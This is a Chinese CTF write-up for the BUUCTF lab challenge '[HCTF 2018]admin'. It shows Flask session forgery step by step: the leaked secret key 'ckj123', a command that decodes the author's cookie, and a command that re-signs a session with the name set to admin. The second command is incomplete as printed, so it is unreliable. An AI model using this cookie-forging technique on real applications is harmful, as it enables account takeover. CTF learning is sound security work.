首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >[HCTF 2018]admin

[HCTF 2018]admin

作者头像
熔城Sec
发布2026-07-22 20:39:00
发布2026-07-22 20:39:00
1000
举报

01、题目简介

  • 题目名称:[HCTF 2018]admin
  • 题目平台:BUUCTF
  • 题目类型:Web

02、解题步骤

启动并访问靶机

查看网页源代码,发现存在一条<!-- you are not admin -->

猜测获取flag需要登录admin账户,这边先注册一个账户,进去看一下,然后在change_password的页面里面发现存在以下链接

代码语言:javascript
复制
https://github.com/woadsl1234/hctf_flask/

但是该项目目前已经打不开了,找不到源码了,只能猜测该项目是使用了Flask 框架,但是因为没有源码只能照着大佬们的WP去做。需要我们伪造身份,我们要进行session伪造,将我们的session伪造成admin的session。

对于session解密一下 ,因为没有key,所以从大佬的WP中剽窃到了key : ckj123

工具:https://github.com/noraj/flask-session-cookie-manager

代码语言:javascript
复制
python flask_session_cookie_manager3.py decode -c ".eJw9kEGLwjAQhf_KMmcPNVsvggeX1uJCJrSkhslFXK1N08QFq2gj_vcNLsjc5nu8N28esD2em8HA_LhzQzOBbXeA-QM-fmAOnJWpVjxoSymqypDnn6TWiZD7G4V2GonnGd1FUc6QrRlXuuOhvCGrvJZ0J-mcthjny1PIR255QnYdKFReqDollic82zhkaHS2ZNruA2bfhmQZdJEHofIp2UNP0jiRRY2vR860izekQq5i9spEDRMFX8BzAvvhfNxefvvm9K6AHp3O0JKsA3nt0G4MKexQrgwWdYK2n2lb38lu4o6PFFyvl4uXXed3bfN2oroasf0np52PANprM1xgAtehOb_-BtMEnn8hjW6n.ag5ZwQ.BcXKIT_GL2TvPhCNYPCXySAP3NA" -s "ckj123"

获得自己的session的解密,我们现在需要将自己注册的用户名更替成admin然后再使用key : ckj123进行加密

代码语言:javascript
复制
python -s "ckj123" -t "{'_fresh': False, '_id': b'3d8ec3f685dabc7ab4970c8536f0618d97b61fb3407dfe61a9ef3c60fc12234b23c4f9e8ca405e7cad06f7342aa43da39a5b7da8e83afe23feab891f01a9a68c', 'csrf_token': b'6ced3ca53bfe65aacb51a4e4699f51b5b532c9dd', 'image': b'aDr6', 'name': 'admin', 'user_id': '10'}"

然后进行替换cookie,就能获得flag了

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2026-05-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 熔城Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档